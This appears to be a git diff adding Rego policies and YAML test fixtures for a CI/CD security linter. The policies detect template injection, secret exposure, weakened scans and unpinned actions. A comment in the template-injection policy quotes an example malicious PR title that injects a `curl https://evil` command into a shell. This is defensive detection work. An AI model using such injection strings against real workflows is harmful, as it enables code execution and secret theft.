+ "gitleaks/gitleaks-action",
+ "shiftleftsecurity/scan-action",
+ "zaproxy/action-baseline",
+}
+
+deny contains finding if {
+ input.pipeline.provider == "github"
+ count(input.pipeline.jobs) > 0
+ not _any_workflow_runs_sast
+ # Emit once, anchored on the first job's file so the renderer
+ # has something to show in the `β³ at` hint.
+ first_file := input.pipeline.jobs[0].originFile
+ finding := {
+ "code": "ISSUE-609",
+ "severity": "low",
+ "message": "repository ships workflows but none runs a recognised SAST scanner β add CodeQL / Semgrep / SonarQube / Trivy",
+ "file": first_file,
+ }
+}
+
+_any_workflow_runs_sast if {
+ some i, j
+ action := input.pipeline.jobs[i].uses[j]
+ some prefix in sast_action_prefixes
+ startswith(action.uses, sprintf("%s@", [prefix]))
+}
+
+_any_workflow_runs_sast if {
+ some i, j
+ action := input.pipeline.jobs[i].uses[j]
+ some prefix in sast_action_prefixes
+ action.uses == prefix
+}
diff --git a/policies/secrets_dynamic_index.rego b/policies/secrets_dynamic_index.rego
new file mode 100644
index 0000000..ba46601
--- /dev/null
+++ b/policies/secrets_dynamic_index.rego
@@ -0,0 +1,57 @@
+# secrets-dynamic-index β flag workflows that access a secret through
+# a non-literal index: `${{ secrets[expr] }}` with expr = env.X,
+# inputs.X, matrix.X, vars.X, or any expression. The bracket form
+# resolves the secret name at runtime, which defers authorisation
+# from the reviewer (who reads the YAML) to whatever drives expr.
+#
+# When expr is maintainer-controlled (an env binding in the same
+# workflow) the immediate risk is low; the real concern is the
+# pattern's fragility β a later refactor that introduces a template
+# expression at the indexed position, or a matrix parameter that
+# leaks into expr, promotes the weakness silently.
+#
+# Detection looks across scripts, env values and action `with:`
+# inputs for the pattern `secrets[...]` where the inside is anything
+# other than a pure quoted string literal.
+package secrets_dynamic_index
+
+import rego.v1
+
+# Match `secrets[...]` where the inner content is NOT a quoted
+# literal. The first character inside the brackets indicates what we
+# caught:
+# - A single / double quote β `secrets['NAME']` is the safe form,
+# skip.
+# - Anything else (env., inputs., matrix., vars., `format(β¦)`, β¦)
+# β flag.
+dynamic_index_pattern := `\$\{\{\s*secrets\s*\[\s*[^'"\s\]]`
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ _job_uses_dynamic_secret_index(job)
+ finding := {
+ "code": "ISSUE-308",
+ "severity": "low",
+ "message": sprintf("job %q reads a secret through a dynamic index `secrets[...]` β the grant surface is not explicit in the workflow source", [job.name]),
+ "job": job.name,
+ }
+}
+
+_job_uses_dynamic_secret_index(job) if {
+ some k
+ regex.match(dynamic_index_pattern, job.scripts[k])
+}
+
+_job_uses_dynamic_secret_index(job) if {
+ some _, value in job.variables
+ regex.match(dynamic_index_pattern, value)
+}
+
+_job_uses_dynamic_secret_index(job) if {
+ some k
+ action := job.uses[k]
+ some _, value in action.with
+ is_string(value)
+ regex.match(dynamic_index_pattern, value)
+}
diff --git a/policies/secrets_inherit.rego b/policies/secrets_inherit.rego
new file mode 100644
index 0000000..574766a
--- /dev/null
+++ b/policies/secrets_inherit.rego
@@ -0,0 +1,31 @@
+# secrets-inherit β flag reusable-workflow calls that forward every
+# caller-visible secret to the callee via `secrets: inherit`.
+# The blast radius of a compromised reusable workflow then scales with
+# the caller's full secret surface (repository + organisation +
+# environment) rather than with the narrow set the callee actually
+# needs. Explicit per-secret mappings are the safer pattern:
+#
+# jobs:
+# call:
+# uses: owner/shared/.github/workflows/publish.yml@abc123β¦
+# secrets:
+# NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
+#
+# The collector surfaces ReusableWorkflowUses and SecretsInherit on
+# the IR directly, so the rule reduces to checking those two fields.
+package secrets_inherit
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ job.reusableWorkflowUses != ""
+ job.secretsInherit == true
+ finding := {
+ "code": "ISSUE-302",
+ "severity": "high",
+ "message": sprintf("job %q calls reusable workflow %q with `secrets: inherit` β forward only the secrets the callee needs", [job.name, job.reusableWorkflowUses]),
+ "job": job.name,
+ }
+}
diff --git a/policies/secrets_outside_env.rego b/policies/secrets_outside_env.rego
new file mode 100644
index 0000000..13320d9
--- /dev/null
+++ b/policies/secrets_outside_env.rego
@@ -0,0 +1,89 @@
+# secrets-outside-env β flag deploy / publish / release jobs that
+# consume production secrets without an `environment:` gate. GitHub's
+# environment feature is the hook for required reviewers, wait
+# timers, and deployment branch rules β without one, any caller on
+# the trigger reaches the secret-bearing step with no human in the
+# loop.
+#
+# The heuristic: a job that either
+#
+# - runs on the `release` trigger, OR
+# - invokes a canonical publish action (PyPI, npm, Maven Central,
+# container-image push, k8s apply, β¦)
+#
+# AND references a secret (`secrets.*`) in its scripts / env / action
+# inputs AND has no `environment:` set. Normal CI jobs that happen to
+# read a secret (CODECOV_TOKEN, NPM_TOKEN for tests) stay silent β the
+# deploy-like context is a prerequisite.
+package secrets_outside_env
+
+import rego.v1
+
+publish_action_prefixes := {
+ "pypa/gh-action-pypi-publish",
+ "JS-DevTools/npm-publish",
+ "gradle/publish-plugin",
+ "softprops/action-gh-release",
+ "ncipollo/release-action",
+ "goreleaser/goreleaser-action",
+ "docker/build-push-action",
+ "azure/k8s-deploy",
+ "google-github-actions/deploy-cloudrun",
+ "google-github-actions/deploy-appengine",
+ "aws-actions/amazon-ecs-deploy-task-definition",
+}
+
+secret_ref_pattern := `\$\{\{\s*secrets\.[A-Za-z_]`
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ _is_deploy_context(job)
+ _job_uses_secrets(job)
+ not job.environment
+ finding := {
+ "code": "ISSUE-305",
+ "severity": "medium",
+ "message": sprintf("deploy/publish job %q consumes secrets without an `environment:` gate β no reviewer, wait timer or branch rule stands between the trigger and the secret", [job.name]),
+ "job": job.name,
+ }
+}
+
+_is_deploy_context(job) if {
+ some t in job.triggers
+ t == "release"
+}
+
+_is_deploy_context(job) if {
+ some k
+ action := job.uses[k]
+ _is_publish_action(action.uses)
+}
+
+_is_publish_action(uses) if {
+ some prefix in publish_action_prefixes
+ startswith(uses, sprintf("%s@", [prefix]))
+}
+
+_is_publish_action(uses) if {
+ some prefix in publish_action_prefixes
+ uses == prefix
+}
+
+_job_uses_secrets(job) if {
+ some k
+ regex.match(secret_ref_pattern, job.scripts[k])
+}
+
+_job_uses_secrets(job) if {
+ some _, value in job.variables
+ regex.match(secret_ref_pattern, value)
+}
+
+_job_uses_secrets(job) if {
+ some k
+ action := job.uses[k]
+ some _, value in action.with
+ is_string(value)
+ regex.match(secret_ref_pattern, value)
+}
diff --git a/policies/security_jobs_weakened.rego b/policies/security_jobs_weakened.rego
new file mode 100644
index 0000000..0cc506d
--- /dev/null
+++ b/policies/security_jobs_weakened.rego
@@ -0,0 +1,90 @@
+# security-jobs-weakened β flag pipeline jobs that match the security
+# job naming convention (SAST, Secret Detection, Dependency Scanning,
+# β¦) and are silently weakened via allow_failure: true or
+# when: manual. These settings let broken or skipped scans look like
+# a passing pipeline, defeating the guardrail they provide.
+#
+# Config:
+# input.config.securityJobsWeakened.securityJobPatterns = ["*-sast", β¦]
+# input.config.securityJobsWeakened.allowFailureMustBeFalse = true
+# input.config.securityJobsWeakened.whenMustNotBeManual = true
+package security_jobs_weakened
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ _is_security_job(job.name)
+ reason := _weakening_reason(job)
+ finding := {
+ "code": "ISSUE-410",
+ "severity": "high",
+ "message": sprintf("security job %q is weakened: %s", [job.name, reason]),
+ "job": job.name,
+ "detail": reason,
+ }
+}
+
+_is_security_job(name) if {
+ pattern := input.config.securityJobsWeakened.securityJobPatterns[_]
+ glob.match(pattern, null, name)
+}
+
+_weakening_reason(job) := "allow_failure: true masks scan failures" if {
+ input.config.securityJobsWeakened.allowFailureMustBeFalse == true
+ job.allowFailure == true
+}
+
+_weakening_reason(job) := "when: manual prevents the scan from running automatically" if {
+ input.config.securityJobsWeakened.whenMustNotBeManual == true
+ job.when == "manual"
+}
+
+# Rules-block weakening: an unconditional `- when: never` (or
+# `manual`) inside the job's rules block neutralises the scan. Two
+# project-side signals qualify a job as "redefined":
+# - originKind in {"hardcoded", "local", "project"}: the job was
+# declared by the project's own files.
+# - overridden == true: the job comes from an upstream
+# component/template but the project locally redefined keys.
+# Vanilla upstream-only definitions (e.g. SAST template's deprecated
+# bandit-sast) carry `when: never` legitimately and are skipped.
+_weakening_reason(job) := sprintf("rules overridden with 'when: %s', job will not run", [w]) if {
+ input.config.securityJobsWeakened.rulesMustNotBeRedefined == true
+ _rules_redefined_by_project(job)
+ some i
+ rule := job.rules[i]
+ w := rule.when
+ _blocking_when(w)
+}
+
+# A job's rules are "redefined by the project" when either
+# - the job is locally authored (hardcoded / local / project file)
+# and ships with a rules: block, or
+# - the job is overridden from an upstream component/template and
+# the override list explicitly mentions `rules`.
+# Vanilla upstream rules β even with a `when: never` line for a
+# deprecated analyzer β must NOT count as a project-side weakening.
+_rules_redefined_by_project(job) if {
+ job.originKind == "hardcoded"
+}
+
+_rules_redefined_by_project(job) if {
+ job.originKind == "local"
+}
+
+_rules_redefined_by_project(job) if {
+ job.originKind == "project"
+}
+
+_rules_redefined_by_project(job) if {
+ job.overridden == true
+ some k
+ job.overriddenKeys[k] == "rules"
+}
+
+_blocking_when("never")
+
+_blocking_when("manual")
+
diff --git a/policies/security_policy_missing.rego b/policies/security_policy_missing.rego
new file mode 100644
index 0000000..7ffdc04
--- /dev/null
+++ b/policies/security_policy_missing.rego
@@ -0,0 +1,27 @@
+# security-policy-missing β flag repositories that have workflows
+# but no SECURITY.md disclosure policy. Without one, researchers
+# who find an issue have no public contact channel beyond opening
+# a GitHub issue, which defeats coordinated disclosure and trains
+# them to dump vulnerabilities in the open. The file can be short:
+# two lines naming the contact channel and the expected response
+# window are enough to move reports off the public tracker.
+#
+# The collector probes the three locations GitHub itself recognises
+# (repo root, `.github/`, `docs/`) and surfaces the path when it
+# finds one. Empty path β finding.
+package security_policy_missing
+
+import rego.v1
+
+deny contains finding if {
+ input.pipeline.provider == "github"
+ count(input.pipeline.jobs) > 0
+ not input.pipeline.securityPolicyPath
+ first_file := input.pipeline.jobs[0].originFile
+ finding := {
+ "code": "ISSUE-610",
+ "severity": "low",
+ "message": "repository has workflows but no SECURITY.md policy file β add one at the repo root or under .github/ to document the disclosure channel",
+ "file": first_file,
+ }
+}
diff --git a/policies/stale_action_ref.rego b/policies/stale_action_ref.rego
new file mode 100644
index 0000000..5cfc99c
--- /dev/null
+++ b/policies/stale_action_ref.rego
@@ -0,0 +1,51 @@
+# stale-action-ref β flag workflow steps pinned to a SHA that is
+# behind the action's latest upstream release. Stale pins miss
+# security fixes and dependency bumps shipped in later tags. Low
+# severity β not every project must track latest, but visibility on
+# the gap lets Dependabot (or the maintainer) plan refreshes.
+#
+# Runs only when the collector resolved both the pinned ref and the
+# latest release's SHA. Tag pins that happen to equal the latest
+# stay silent β they are already up-to-date.
+package stale_action_ref
+
+import rego.v1
+
+sha_pattern := `^[0-9a-f]{40}$`
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ action := job.uses[j]
+ action.metadata
+ action.metadata.latestReleaseSha != ""
+ ref := _ref_of(action.uses)
+ pinned := _pinned_sha(ref, action.metadata)
+ pinned != ""
+ pinned != action.metadata.latestReleaseSha
+ finding := {
+ "code": "ISSUE-111",
+ "severity": "low",
+ "message": sprintf("job %q pins %q behind the latest release %q β refresh to pick up upstream security fixes", [job.name, action.uses, action.metadata.latestTag]),
+ "job": job.name,
+ "line": object.get(action, "line", 0),
+ }
+}
+
+# _pinned_sha returns the SHA the current ref resolves to. For a SHA
+# pin, that's the ref itself; for a tag pin, metadata.tagSha carries
+# the resolved value.
+_pinned_sha(ref, meta) := ref if {
+ regex.match(sha_pattern, ref)
+}
+
+_pinned_sha(_, meta) := meta.tagSha if {
+ meta.tagSha != ""
+ meta.refKind == "tag"
+}
+
+_ref_of(uses) := ref if {
+ idx := indexof(uses, "@")
+ idx >= 0
+ ref := substring(uses, idx + 1, -1)
+}
diff --git a/policies/superfluous_action.rego b/policies/superfluous_action.rego
new file mode 100644
index 0000000..1bb49b2
--- /dev/null
+++ b/policies/superfluous_action.rego
@@ -0,0 +1,58 @@
+# superfluous-action β flag third-party actions that duplicate
+# functionality already on the GitHub-hosted runner. Each such
+# reference is an extra supply-chain dependency for zero capability
+# gain β the sort of link an `impostor-commit`, a tag retag, or a
+# maintainer account compromise can turn into a foothold without
+# any functional reason to have accepted the risk.
+#
+# The curated list tracks the most common offenders: small wrappers
+# over `gh`, shell retry loops, and action installers for tools
+# `ubuntu-latest` already has on PATH (`yq`, `jq`, `python`). It is
+# intentionally conservative β complex actions (`actions/cache`,
+# `actions/artifact`, `actions/setup-`) do enough real work to
+# stay off this list.
+#
+# Users who disagree with a specific entry can drop the rule on the
+# workflow via `--skip-controls actionsMustNotDuplicateRunnerBuiltins`
+# rather than fight the list.
+package superfluous_action
+
+import rego.v1
+
+superfluous_prefixes := {
+ "peter-evans/create-pull-request": "gh pr create from the runner",
+ "nick-invision/retry": "bash `for i in 1 2 3; do ... && break; done`",
+ "nick-fields/retry": "bash `for i in 1 2 3; do ... && break; done`",
+ "actions-ecosystem/action-regex-match": "bash `[[ $X =~ $re ]]` / `grep -E`",
+ "mikefarah/yq-action": "`yq` is preinstalled on ubuntu-latest",
+ "dcarbone/install-jq-action": "`jq` is preinstalled on ubuntu-latest",
+ "nicholasdille/run-with-retry": "bash retry loop",
+ "andymckay/labeler": "gh api gh pr edit --add-label",
+ "actions-ecosystem/action-add-labels": "gh api gh pr edit --add-label",
+}
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ action := job.uses[j]
+ reason := _superfluous_reason(action.uses)
+ finding := {
+ "code": "ISSUE-115",
+ "severity": "low",
+ "message": sprintf("job %q uses %q β same effect as %q from the runner, drop the third-party dependency", [job.name, action.uses, reason]),
+ "job": job.name,
+ "line": object.get(action, "line", 0),
+ }
+}
+
+_superfluous_reason(uses) := reason if {
+ some prefix, r in superfluous_prefixes
+ startswith(uses, sprintf("%s@", [prefix]))
+ reason := r
+}
+
+_superfluous_reason(uses) := reason if {
+ some prefix, r in superfluous_prefixes
+ uses == prefix
+ reason := r
+}
diff --git a/policies/template_injection.rego b/policies/template_injection.rego
new file mode 100644
index 0000000..d40d7b8
--- /dev/null
+++ b/policies/template_injection.rego
@@ -0,0 +1,42 @@
+# template-injection β flag inline `run:` scripts that interpolate
+# user-controlled GitHub template expressions directly into the shell
+# command. The canonical attacker scenario: a pull request opens with
+# a crafted title like `"; curl https://evil; #` and the workflow
+# pastes it verbatim into a shell one-liner. Under a privileged
+# trigger (`pull_request_target`, `workflow_run`, β¦) the attacker ends
+# up executing arbitrary code with the repo's secrets.
+#
+# Severity is "critical" for the same reasons as dangerous-triggers
+# (ISSUE-414): this is the pattern behind the March 2025
+# tj-actions/changed-files supply-chain compromise
+# (CVE-2025-30066). The safe way to use such values is via an env:
+# binding, then dereferencing the environment variable ("$TITLE"),
+# which shell-escapes the value. This policy flags only direct
+# interpolation inside `run:`, so the env-binding pattern remains
+# quiet.
+package template_injection
+
+import rego.v1
+
+# Regex patterns matching template expressions whose value is under
+# the control of an unprivileged PR author. Additional patterns can
+# be added here as the check evolves; the shared message keeps the
+# output simple regardless of which pattern matched.
+unsafe_patterns := [
+ `\${{\s*github\.event\.`,
+ `\${{\s*github\.head_ref\s*}}`,
+]
+
+deny contains finding if {
+ some i, j, k
+ job := input.pipeline.jobs[i]
+ script := job.scripts[j]
+ pattern := unsafe_patterns[k]
+ regex.match(pattern, script)
+ finding := {
+ "code": "ISSUE-206",
+ "severity": "critical",
+ "message": sprintf("job %q interpolates a user-controlled template expression into an inline script (template-injection risk)", [job.name]),
+ "job": job.name,
+ }
+}
diff --git a/policies/template_injection_vars.rego b/policies/template_injection_vars.rego
new file mode 100644
index 0000000..598171c
--- /dev/null
+++ b/policies/template_injection_vars.rego
@@ -0,0 +1,43 @@
+# template-injection-vars β flag `run:` scripts that expand a
+# maintainer-adjacent template directly into the shell. Distinct
+# from ISSUE-206 (template-injection) which targets PR-author-
+# controlled `github.event.*` / `github.head_ref` β here the
+# sources are:
+#
+# - `vars.*` β repo / org / environment variables set by
+# maintainers. Exploitable on a maintainer
+# account compromise or a misconfigured
+# organisation-level variable.
+# - `inputs.*` β reusable-workflow inputs. When the reusable
+# workflow is called from a fork-influenceable
+# trigger (e.g. a caller workflow that proxies
+# `github.event.*` into inputs), the surface
+# flips to PR-author-controlled.
+#
+# Confidence is lower than ISSUE-206; severity stays at "low".
+# The fix is the same for both: bind the value through `env:`
+# first, then dereference the shell variable from the `run:` body
+# so expansion quotes the value instead of concatenating it as
+# code.
+package template_injection_vars
+
+import rego.v1
+
+unsafe_patterns := [
+ `\$\{\{\s*vars\.`,
+ `\$\{\{\s*inputs\.`,
+]
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ script := job.scripts[j]
+ some k
+ regex.match(unsafe_patterns[k], script)
+ finding := {
+ "code": "ISSUE-215",
+ "severity": "low",
+ "message": sprintf("job %q expands a maintainer-adjacent template (`vars.*` or `inputs.*`) directly into a shell script β bind through `env:` and reference $VAR instead", [job.name]),
+ "job": job.name,
+ }
+}
diff --git a/policies/template_missing.rego b/policies/template_missing.rego
new file mode 100644
index 0000000..c915b77
--- /dev/null
+++ b/policies/template_missing.rego
@@ -0,0 +1,65 @@
+# template-missing β flag pipelines that do not include every CI/CD
+# template required by pipelineMustIncludeTemplate.requiredGroups.
+# Templates can be pulled via `include: { project: β¦ }`, via
+# `include: { template: β¦ }`, or via Plumber-augmented metadata; the
+# collector normalises each origin's path(s) for comparison. The
+# hardcoded origin is always skipped β it represents the project's own
+# .gitlab-ci.yml body, not an imported template.
+package template_missing
+
+import rego.v1
+
+deny contains finding if {
+ input.config.pipelineMustIncludeTemplate
+ groups := input.config.pipelineMustIncludeTemplate.requiredGroups
+ count(groups) > 0
+ not _any_group_satisfied(groups)
+ some i, j
+ group := groups[i]
+ required := group[j]
+ not _template_present(required)
+ finding := {
+ "code": "ISSUE-405",
+ "severity": "high",
+ "message": sprintf("required template %q is missing from the pipeline (group %d)", [required, i]),
+ "job": required,
+ }
+}
+
+# DNF: only emit findings when no group is fully satisfied.
+_any_group_satisfied(groups) if {
+ some i
+ group := groups[i]
+ count(group) > 0
+ every required in group {
+ _template_present(required)
+ }
+}
+
+_template_present(required) if {
+ some k
+ inc := input.pipeline.includes[k]
+ _is_template_kind(inc.kind)
+ _paths_match(inc, required)
+}
+
+_is_template_kind(kind) if {
+ kind != "component"
+ kind != "hardcoded"
+ kind != ""
+}
+
+_paths_match(inc, required) if {
+ inc.path != ""
+ inc.path == required
+}
+
+_paths_match(inc, required) if {
+ inc.altPath != ""
+ inc.altPath == required
+}
+
+_paths_match(inc, required) if {
+ inc.source != ""
+ inc.source == required
+}
diff --git a/policies/template_overridden.rego b/policies/template_overridden.rego
new file mode 100644
index 0000000..bd8f648
--- /dev/null
+++ b/policies/template_overridden.rego
@@ -0,0 +1,49 @@
+# template-overridden β flag pipelines that import a required CI/CD
+# template but redefine some of its jobs with forbidden CI/CD keys
+# (script, image, rules, β¦). The match set comes from
+# pipelineMustIncludeTemplate.requiredGroups and the per-origin
+# overridden-job list is populated by the collector (same regex as the
+# legacy Go control).
+package template_overridden
+
+import rego.v1
+
+deny contains finding if {
+ input.config.pipelineMustIncludeTemplate
+ groups := input.config.pipelineMustIncludeTemplate.requiredGroups
+ count(groups) > 0
+ some i, j, k
+ group := groups[i]
+ required := group[j]
+ inc := input.pipeline.includes[k]
+ _is_template_kind(inc.kind)
+ _paths_match(inc, required)
+ count(inc.overriddenJobs) > 0
+ finding := {
+ "code": "ISSUE-406",
+ "severity": "high",
+ "message": sprintf("required template %q is imported but %d of its job(s) are overridden locally", [required, count(inc.overriddenJobs)]),
+ "job": required,
+ }
+}
+
+_is_template_kind(kind) if {
+ kind != "component"
+ kind != "hardcoded"
+ kind != ""
+}
+
+_paths_match(inc, required) if {
+ inc.path != ""
+ inc.path == required
+}
+
+_paths_match(inc, required) if {
+ inc.altPath != ""
+ inc.altPath == required
+}
+
+_paths_match(inc, required) if {
+ inc.source != ""
+ inc.source == required
+}
diff --git a/policies/testdata/ISSUE-101/gitlab/clean_official.gitlab-ci.yml b/policies/testdata/ISSUE-101/gitlab/clean_official.gitlab-ci.yml
new file mode 100644
index 0000000..b2fe989
--- /dev/null
+++ b/policies/testdata/ISSUE-101/gitlab/clean_official.gitlab-ci.yml
@@ -0,0 +1,4 @@
+build:
+ image: python:3.12-slim
+ script:
+ - echo build
diff --git a/policies/testdata/ISSUE-101/gitlab/violation_untrusted.gitlab-ci.yml b/policies/testdata/ISSUE-101/gitlab/violation_untrusted.gitlab-ci.yml
new file mode 100644
index 0000000..47483b3
--- /dev/null
+++ b/policies/testdata/ISSUE-101/gitlab/violation_untrusted.gitlab-ci.yml
@@ -0,0 +1,4 @@
+build:
+ image: ghcr.io/attacker/unknown:1.0
+ script:
+ - echo build
diff --git a/policies/testdata/ISSUE-102/github/clean.workflow.yml b/policies/testdata/ISSUE-102/github/clean.workflow.yml
new file mode 100644
index 0000000..55efdb0
--- /dev/null
+++ b/policies/testdata/ISSUE-102/github/clean.workflow.yml
@@ -0,0 +1,18 @@
+# GitHub Actions workflow β all container tags pinned to specific versions.
+# Expected: 0 findings.
+name: CI
+on: push
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ container: alpine:3.19
+ steps:
+ - run: echo build
+
+ deploy:
+ runs-on: ubuntu-latest
+ container:
+ image: node:20.10.0
+ steps:
+ - run: echo deploy
diff --git a/policies/testdata/ISSUE-102/github/violation_latest.workflow.yml b/policies/testdata/ISSUE-102/github/violation_latest.workflow.yml
new file mode 100644
index 0000000..5e91d37
--- /dev/null
+++ b/policies/testdata/ISSUE-102/github/violation_latest.workflow.yml
@@ -0,0 +1,17 @@
+# GitHub Actions workflow β forbidden tag "latest" on the deploy job.
+# Expected: 1 finding on deploy.
+name: CI
+on: push
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ container: alpine:3.19
+ steps:
+ - run: echo build
+
+ deploy:
+ runs-on: ubuntu-latest
+ container: alpine:latest
+ steps:
+ - run: echo deploy
diff --git a/policies/testdata/ISSUE-102/github/violation_wildcards.workflow.yml b/policies/testdata/ISSUE-102/github/violation_wildcards.workflow.yml
new file mode 100644
index 0000000..30f3466
--- /dev/null
+++ b/policies/testdata/ISSUE-102/github/violation_wildcards.workflow.yml
@@ -0,0 +1,12 @@
+# GitHub Actions workflow β wildcard match against pattern "*-alpha".
+# Expected: 1 finding on ci. Uses the long-form container: { image: ... }.
+name: CI
+on: push
+
+jobs:
+ ci:
+ runs-on: ubuntu-latest
+ container:
+ image: node:20-alpha
+ steps:
+ - run: echo test
diff --git a/policies/testdata/ISSUE-102/gitlab/clean.gitlab-ci.yml b/policies/testdata/ISSUE-102/gitlab/clean.gitlab-ci.yml
new file mode 100644
index 0000000..6afe2e7
--- /dev/null
+++ b/policies/testdata/ISSUE-102/gitlab/clean.gitlab-ci.yml
@@ -0,0 +1,16 @@
+# All tags are pinned to specific versions. Expected: 0 findings.
+stages:
+ - build
+ - deploy
+
+build:
+ stage: build
+ image: alpine:3.19
+ script:
+ - echo build
+
+deploy:
+ stage: deploy
+ image: node:20.10.0
+ script:
+ - echo deploy
diff --git a/policies/testdata/ISSUE-102/gitlab/violation_latest.gitlab-ci.yml b/policies/testdata/ISSUE-102/gitlab/violation_latest.gitlab-ci.yml
new file mode 100644
index 0000000..7963d19
--- /dev/null
+++ b/policies/testdata/ISSUE-102/gitlab/violation_latest.gitlab-ci.yml
@@ -0,0 +1,16 @@
+# Forbidden tag 'latest' on one job. Expected: 1 finding on deploy.
+stages:
+ - build
+ - deploy
+
+build:
+ stage: build
+ image: alpine:3.19
+ script:
+ - echo build
+
+deploy:
+ stage: deploy
+ image: alpine:latest
+ script:
+ - echo deploy
diff --git a/policies/testdata/ISSUE-102/gitlab/violation_wildcards.gitlab-ci.yml b/policies/testdata/ISSUE-102/gitlab/violation_wildcards.gitlab-ci.yml
new file mode 100644
index 0000000..13475af
--- /dev/null
+++ b/policies/testdata/ISSUE-102/gitlab/violation_wildcards.gitlab-ci.yml
@@ -0,0 +1,9 @@
+# Wildcard match against pattern '*-alpha'. Expected: 1 finding on ci.
+stages:
+ - test
+
+ci:
+ stage: test
+ image: node:20-alpha
+ script:
+ - echo test
diff --git a/policies/testdata/ISSUE-103/github/clean_pinned.workflow.yml b/policies/testdata/ISSUE-103/github/clean_pinned.workflow.yml
new file mode 100644
index 0000000..397f130
--- /dev/null
+++ b/policies/testdata/ISSUE-103/github/clean_pinned.workflow.yml
@@ -0,0 +1,11 @@
+# Digest-pinned container image. Expected: 0 findings.
+name: CI
+on: push
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ container:
+ image: alpine@sha256:c5b1261d6d3e43071626931fc004f70149baeba2c8ec672bd4f27761f8e1ad6b
+ steps:
+ - run: echo build
diff --git a/policies/testdata/ISSUE-103/github/violation_tagged.workflow.yml b/policies/testdata/ISSUE-103/github/violation_tagged.workflow.yml
new file mode 100644
index 0000000..cd063a5
--- /dev/null
+++ b/policies/testdata/ISSUE-103/github/violation_tagged.workflow.yml
@@ -0,0 +1,11 @@
+# Same rule on GitHub Actions: tagged containers fire when
+# mustBePinnedByDigest is enforced. Expected: 1 finding on build.
+name: CI
+on: push
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ container: alpine:3.19
+ steps:
+ - run: echo build
diff --git a/policies/testdata/ISSUE-103/gitlab/clean_pinned.gitlab-ci.yml b/policies/testdata/ISSUE-103/gitlab/clean_pinned.gitlab-ci.yml
new file mode 100644
index 0000000..046dc97
--- /dev/null
+++ b/policies/testdata/ISSUE-103/gitlab/clean_pinned.gitlab-ci.yml
@@ -0,0 +1,9 @@
+# All images pinned by sha256 digest. Expected: 0 findings.
+stages:
+ - build
+
+build:
+ stage: build
+ image: alpine@sha256:c5b1261d6d3e43071626931fc004f70149baeba2c8ec672bd4f27761f8e1ad6b
+ script:
+ - echo build
diff --git a/policies/testdata/ISSUE-103/gitlab/violation_tagged.gitlab-ci.yml b/policies/testdata/ISSUE-103/gitlab/violation_tagged.gitlab-ci.yml
new file mode 100644
index 0000000..cae9f1d
--- /dev/null
+++ b/policies/testdata/ISSUE-103/gitlab/violation_tagged.gitlab-ci.yml
@@ -0,0 +1,17 @@
+# Tagged images without a digest, flagged when mustBePinnedByDigest is on.
+# Expected: 2 findings (both jobs).
+stages:
+ - build
+ - deploy
+
+build:
+ stage: build
+ image: alpine:3.19
+ script:
+ - echo build
+
+deploy:
+ stage: deploy
+ image: node:20.10.0
+ script:
+ - echo deploy
diff --git a/policies/testdata/ISSUE-104/github/clean_sha_pinned.yml b/policies/testdata/ISSUE-104/github/clean_sha_pinned.yml
new file mode 100644
index 0000000..cfcff9d
--- /dev/null
+++ b/policies/testdata/ISSUE-104/github/clean_sha_pinned.yml
@@ -0,0 +1,15 @@
+# All third-party actions pinned by 40-character commit SHA.
+# peaceiris/actions-gh-pages@4f9cc6602b3c52e6dd3ff78e1a74bbf0d0a45c9a
+# is a real commit SHA from v3.9.3 (March 2024). Expected: 0 findings.
+name: Release
+on: [push]
+
+jobs:
+ release:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
+ - uses: peaceiris/actions-gh-pages@4f9cc6602b3c52e6dd3ff78e1a74bbf0d0a45c9a
+ with:
+ github_token: ${{ secrets.GITHUB_TOKEN }}
+ publish_dir: ./public
diff --git a/policies/testdata/ISSUE-104/github/trusted_owner_tag.yml b/policies/testdata/ISSUE-104/github/trusted_owner_tag.yml
new file mode 100644
index 0000000..8a425d6
--- /dev/null
+++ b/policies/testdata/ISSUE-104/github/trusted_owner_tag.yml
@@ -0,0 +1,13 @@
+# When trustedOwners contains "actions" and "github", first-party
+# GitHub-owned actions can keep tag-based refs. The third-party
+# action (peaceiris) is still flagged. Expected: 1 finding (peaceiris).
+name: Release
+on: [push]
+
+jobs:
+ release:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: github/codeql-action/init@v3
+ - uses: peaceiris/actions-gh-pages@v3
diff --git a/policies/testdata/ISSUE-104/github/violation_tag_ref.yml b/policies/testdata/ISSUE-104/github/violation_tag_ref.yml
new file mode 100644
index 0000000..cad8121
--- /dev/null
+++ b/policies/testdata/ISSUE-104/github/violation_tag_ref.yml
@@ -0,0 +1,18 @@
+# actions/checkout@v4 is a mutable tag. The maintainer can retag v4 to
+# point at any commit β or an attacker who compromises the maintainer's
+# account can do the same. Pin by 40-char commit SHA instead. Expected:
+# 2 findings (checkout + setup-node β both mutable refs; peaceiris IS
+# a third-party action so it is flagged too).
+name: Release
+on: [push]
+
+jobs:
+ release:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: actions/setup-node@v3
+ - uses: peaceiris/actions-gh-pages@v3
+ with:
+ github_token: ${{ secrets.GITHUB_TOKEN }}
+ publish_dir: ./public
diff --git a/policies/testdata/ISSUE-105/github/clean_no_credentials.yml b/policies/testdata/ISSUE-105/github/clean_no_credentials.yml
new file mode 100644
index 0000000..647a478
--- /dev/null
+++ b/policies/testdata/ISSUE-105/github/clean_no_credentials.yml
@@ -0,0 +1,11 @@
+# Public image β no credentials block at all. Expected: 0 findings.
+name: Build
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ container:
+ image: node:20
+ steps:
+ - run: echo build
